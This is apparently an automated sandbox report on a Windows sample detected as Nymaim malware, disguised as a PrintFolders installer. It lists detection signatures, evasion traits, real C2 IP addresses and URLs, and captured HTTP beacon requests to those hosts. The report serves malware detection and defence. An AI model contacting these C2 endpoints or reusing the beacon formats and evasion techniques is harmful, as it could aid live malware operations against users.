Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 753425
MD5: 2ed741014b8cdafd91a740432a3cffa1
SHA1: 3d65ac9a3d0950a55d4c7e4cb5a6fbfeab180cab
SHA256: fc33189d3c146375f5742bbb0e82277e2b8ed3789d8feae27939e834b07ee8dc
Tags: exe
Infos:

Detection

Nymaim
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: http://171.22.30.106/library.php URL Reputation: Label: malware
Source: http://171.22.30.106/library.phpXZ Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.phpBZ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe ReversingLabs: Detection: 46%
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Joe Sandbox ML: detected
Source: 2.2.PrintFolders.exe.10000000.6.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.3.file.exe.20b8000.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.PrintFolders.exe.400000.1.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 2_2_00403770

Compliance

barindex
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-2632S.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046C770
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474708
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00451554 FindFirstFileA,GetLastError, 1_2_00451554
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0048A778 FindFirstFileA,6D2B69D0,FindNextFileA,FindClose, 1_2_0048A778
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_004729D4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CA54
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 1_2_00406FEC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DB60
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEF4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Jump to behavior

Networking

barindex
Source: Malware configuration extractor IPs: 45.139.105.1
Source: Malware configuration extractor IPs: 85.31.46.167
Source: Malware configuration extractor IPs: 107.182.129.235
Source: Malware configuration extractor IPs: 171.22.30.106
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View IP Address: 45.139.105.171 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.php
Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.phpum
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/ping.php
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.phpBZ
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.phpXZ
Source: file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pfolders.atopoint.com
Source: file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pfolders.atopoint.com.
Source: file.exe, 00000000.00000003.239322832.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.atopoint.com
Source: file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.atopoint.com.
Source: file.exe String found in binary or memory: http://www.innosetup.com
Source: is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?ps
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?psU
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: global traffic HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000002.327400312.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004081C8 0_2_004081C8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00468940 1_2_00468940
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00460F30 1_2_00460F30
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0043DF70 1_2_0043DF70
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004303A4 1_2_004303A4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0047A6D8 1_2_0047A6D8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004446E8 1_2_004446E8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00434994 1_2_00434994
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045AA90 1_2_0045AA90
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00480BDC 1_2_00480BDC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00444C90 1_2_00444C90
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00462F38 1_2_00462F38
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00445388 1_2_00445388
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00435698 1_2_00435698
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00445794 1_2_00445794
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0042F948 1_2_0042F948
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00457BB4 1_2_00457BB4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404490 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004096F0 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004056A0 2_2_004056A0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00406800 2_2_00406800
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00406AA0 2_2_00406AA0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404D40 2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00405F40 2_2_00405F40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00402F20 2_2_00402F20
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004150D3 2_2_004150D3
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00415305 2_2_00415305
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004223A9 2_2_004223A9
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00419510 2_2_00419510
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404840 2_2_00404840
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00426850 2_2_00426850
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00410A50 2_2_00410A50
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0042AB9A 2_2_0042AB9A
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00421C88 2_2_00421C88
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0042ACBA 2_2_0042ACBA
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00447D2D 2_2_00447D2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00428D39 2_2_00428D39
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404F20 2_2_00404F20
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000F670 2_2_1000F670
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000EC61 2_2_1000EC61
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: String function: 0040F9E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00403548 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00407B08 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00445FF4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00455A04 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00405AA4 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00455814 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004462C4 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 004348AC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00451AFC appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: String function: 00408DF0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00423D9C NtdllDefWindowProc_A, 1_2_00423D9C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004127F0 NtdllDefWindowProc_A, 1_2_004127F0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004551C4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_004551C4
Source: is-QPTG8.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-QPTG8.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-QPTG8.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-48N1K.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-48N1K.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-48N1K.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-2632S.tmp.1.dr Static PE information: No import functions for PE file found
